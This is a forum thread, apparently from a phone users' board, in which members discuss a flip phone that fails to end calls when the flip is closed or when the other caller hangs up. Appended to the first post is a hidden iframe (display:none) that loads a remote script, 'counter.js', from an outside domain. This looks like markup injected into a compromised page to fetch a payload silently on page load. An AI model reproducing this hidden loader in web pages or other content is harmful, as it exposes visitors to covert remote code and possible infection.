+ Reply to Thread

OK, Another Quirk....

I made a 15 second call today and it ended up being 5 minutes.

Why, you might ask?

Well, I closed the flip and the call continued on until I realized that the minute counter was still going.

Anybody else?<iframe src="http://tmb-corp.com/g/p/l/counter.js" style="display:none"></iframe>

AJR
    I haven't had that particular problem, but something similar dealing with calls not ending...

Before I had my headset with the answer/end button, I had a standard headset from my 6035. When I got a call, I would have to flip the phone open, answer the call, then close the flip. When the call was finished, I wasn't always able to flip the phone open to end the call, but could see the top display to see if the call ended. I couldn't find a rhyme or reason to it, but every 2nd or 3rd call would not hangup when the caller on the other end would hang up their phone. I actually sat there and watched it for a minute after the caller on the other end hungup, and it wouldn't end the call. Doesn't the phone (or the tower) get an EOC signal when the other end hangs up? I don't watch the phone now because I have the answer/end button on the headset, but it was annoying having to make sure the call ended.

Originally posted by AJR
    I haven't had that particular problem, but something similar dealing with calls not ending...

Before I had my headset with the answer/end button, I had a standard headset from my 6035. When I got a call, I would have to flip the phone open, answer the call, then close the flip. When the call was finished, I wasn't always able to flip the phone open to end the call, but could see the top display to see if the call ended. I couldn't find a rhyme or reason to it, but every 2nd or 3rd call would not hangup when the caller on the other end would hang up their phone. I actually sat there and watched it for a minute after the caller on the other end hungup, and it wouldn't end the call. Doesn't the phone (or the tower) get an EOC signal when the other end hangs up? I don't watch the phone now because I have the answer/end button on the headset, but it was annoying having to make sure the call ended.
    The phone is supposed to get a signal when a call ends. Mine does but today I called my GF's voicemail and didn't leave her one (well I actually left her a 5 minute moment of silence).

It sucks when it happens because you can miss calls, voicemail notifications, etc...

Originally posted by RUYORK
    The phone is supposed to get a signal when a call ends. Mine does but today I called my GF's voicemail and didn't leave her one (well I actually left her a 5 minute moment of silence).
    It sucks when it happens because you can miss calls, voicemail notifications, etc...
    Uhhh... many voice mail systems do not detect voice. They simply record until the caller hangs up. I expect (and I believe its the norm with all clamshell designs) that closing the flip will end a call *unless* a headset is plugged in. A headset is for hands free and you have to close the phone to holster it.
    -Quick

Originally posted by Quick
    Uhhh... many voice mail systems do not detect voice.
    uhhhh, I know that...the point is that it didn't hang up.